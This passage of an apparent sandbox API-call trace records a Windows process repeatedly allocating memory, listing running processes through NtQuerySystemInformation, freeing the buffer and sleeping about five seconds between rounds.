RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0211.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0211.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0211.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.840] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0211.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0211.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0211.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0211.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0211.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0211.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.968] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0211.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0211.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0211.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0211.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0211.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0212.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.075] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0212.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0212.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0212.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0212.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0212.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0212.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.222] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0212.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0212.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0212.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0212.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0212.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0212.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.331] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0212.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0212.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0212.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0212.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0212.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0212.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.469] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0212.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0212.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0212.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0212.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0212.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0212.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.584] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0212.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0212.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0212.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0212.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0212.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0212.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.729] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0212.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0212.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0212.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0212.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0212.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0212.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.843] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0212.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0212.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0212.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0212.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0212.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0213.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.008] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0213.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0213.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0213.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0213.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0213.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0213.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.180] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0213.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0213.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0213.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0213.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0213.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0213.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.437] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0213.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0213.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0213.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0213.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0213.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0213.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.556] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0213.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0213.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0213.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0213.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0213.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0213.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.673] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0213.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0213.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0213.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0213.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0213.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0213.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.785] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0213.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0213.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0213.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0213.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0213.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0213.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.942] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0213.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0213.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0213.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0213.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0213.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0214.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.094] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0214.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0214.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0214.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0214.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0214.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0214.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.242] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0214.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0214.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0214.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0214.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0214.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0214.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.391] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0214.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0214.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0214.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0214.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0214.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0214.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.548] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0214.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0214.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0214.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0214.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0214.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0214.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.659] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0214.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, 